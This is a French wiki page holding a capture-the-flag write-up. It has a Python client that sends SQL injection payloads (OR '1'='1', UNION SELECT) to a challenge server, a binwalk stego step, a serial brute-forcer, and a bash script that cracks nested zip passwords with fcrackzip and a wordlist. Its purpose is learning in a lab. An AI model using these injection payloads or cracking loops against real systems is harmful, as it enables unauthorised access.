Outils d'utilisateurs

Outils du Site


ctf_mssis_ctf

Ceci est une ancienne révision du document !


Challenges Misc 1 et 2

root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !

Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'

[+] Test level2 … Welcome on level 2 !

Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}

Code source : client.py

client.py
#encoding: utf-8
 
import socket
import sys
 
# change this if needed
HOST = '192.168.1.19'
# change this if needed
IP   = 8096
 
 
def create_socket():
        try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.settimeout(1)
                s.connect((HOST,IP))
        except Exception as e:
                print("Can't open socket !")
                print(e)
                sys.exit(1)
        return s
 
 
def test_level1():
        print("[+] Test level1 ...")
        s = create_socket()
 
        login = 'admin" OR "1"="1'
        password = 'toto" OR "1"="1"  LIMIT "1" OFFSET "2' 
        cmd = "\x01%s\x00%s" % (login,password)
        s.send(cmd.encode('utf-8'))
        msg = s.recv(1024)
 
 
 
        if msg and msg.decode('utf-8').startswith("Welcome"):
                print(msg.decode('utf-8'))
                res = s.recv(1024)
                print(res.decode('utf-8'))
        else:
                print("If you called a valid level, notice an admin")
        s.close()
 
def test_level2():
        print("[+] Test level2 ...")
        s = create_socket()
 
        citation = '123 union SELECT * fROM flag'
        s.send(b"\x02%s" % (citation))
        msg = s.recv(1024)
        if msg and msg.decode('utf-8').startswith("Welcome"):
                print(msg.decode('utf-8'))
                res = s.recv(1024)
                print(res.decode('utf-8'))
        else:
                print("If you called a valid level, notice an admin")
        s.close()
 
 
 
if __name__ == '__main__':
        test_level1()
        print("")
        test_level2()

challenge de stegano

Il falait trouver un fichier caché dans une image. Juste rentrer ca :p et on avait le flag

binwalk –dd='.*' special-k.png

serial

trouver des serials qui respectent le code py suivant

import random, string

def are_same(serial):
	if (serial[0] != serial[1] and
		serial[1] != serial[2] and
		serial[0] != serial[2]):
		return False
	return True

def check_serial(serial):
	try:
		serials = serial.split('-')
	except:
		return False
	if len(serials) != 3:
		return False
	try:

		X = [ord(a) for a in list(serials[0])]
		Y = [ord(a) for a in list(serials[1])]
		Z = int(serials[2])
	except ValueError:
		return False
	except:
		return False

	if not len(X) == 3 or not len(Y) == 3:
		return False

	for a in X+Y:
		#print(a)
		# => MAJ
		if a < 65 or a > 90:
			return False


	if are_same(X) or are_same(Y):
		return False

	if X[1] + 10 > X[2]:
		return False

	if Y[1] - 10 < Y[2]:
		return False
	sum1 = X[0] + X[1] + X[2]
	sum2 = Y[0] + Y[1] + Y[2]
	if sum1 == sum2:
		return False
	if sum1+sum2 != Z:
		return False
	if Z % 3 != 0:
		return False
	return True

au lieu de chercher à la main des valeurs j'ai bruteforcer avec ce code

while 1:
	x=''.join(random.choice(string.ascii_uppercase) for _ in range(3))
	y=''.join(random.choice(string.ascii_uppercase) for _ in range(3))
	z=''.join(random.choice(string.digits) for _ in range(3))

	s="%s-%s-%s"%(x,y,z)
	print s
	if check_serial(s):
		print s
		break
		exit()

exemple de flag DGR-GVH-450

deeper

une archive zip qui a un zip qui a un zip …. avec des pass :/

code bash pour automatiser la tâche

#!/bin/bash

# $1 le nom du zip passé en arg
file=$1
test=true
count=1

while $test; do
	echo "test $count : $file"
	file $file | grep 'Zip'
	if [ "$?" -eq "0" ]; then
		echo "ZIP ok"
		r=$(fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt $file)
		pass=$(echo $r | awk -F"== " '{print $2}')
		echo "pass is : $pass"
		file=$(unzip -P "$pass" $file | grep -E 'extracting|inflating' | awk -F": " '{print $2}')
		echo "new file [$file]"
		count=$(($count+1))
	else

		test=false
	fi
done

output

root@kali:~/deeper# ./run.sh 8KLifFpoUdbxXB5noGIG.zip.start test 1 : 8KLifFpoUdbxXB5noGIG.zip.start 8KLifFpoUdbxXB5noGIG.zip.start: Zip archive data, at least v2.0 to extract ZIP ok pass is : AC020307 new file [6TF2INzK1as0vC4hmGVW.zip ] test 2 : 6TF2INzK1as0vC4hmGVW.zip 6TF2INzK1as0vC4hmGVW.zip: Zip archive data, at least v2.0 to extract ZIP ok pass is : tiagia4 new file [BYJrsoCOfTlWehfvNoBU.zip ] test 3 : BYJrsoCOfTlWehfvNoBU.zip BYJrsoCOfTlWehfvNoBU.zip: Zip archive data, at least v2.0 to extract ZIP ok pass is : jesipato new file [uBKIeGWEztQN7FwsSr6b.zip ] test 4 : uBKIeGWEztQN7FwsSr6b.zip uBKIeGWEztQN7FwsSr6b.zip: Zip archive data, at least v2.0 to extract ZIP ok pass is : benk2007benk new file [exhNdH5BI2Hr0lV99EEs.zip ] test 5 : exhNdH5BI2Hr0lV99EEs.zip exhNdH5BI2Hr0lV99EEs.zip: Zip archive data, at least v2.0 to extract ZIP ok pass is : 02456035 …

ctf_mssis_ctf.1526231119.txt.gz · Dernière modification: 2018/05/13 19:05 par telnes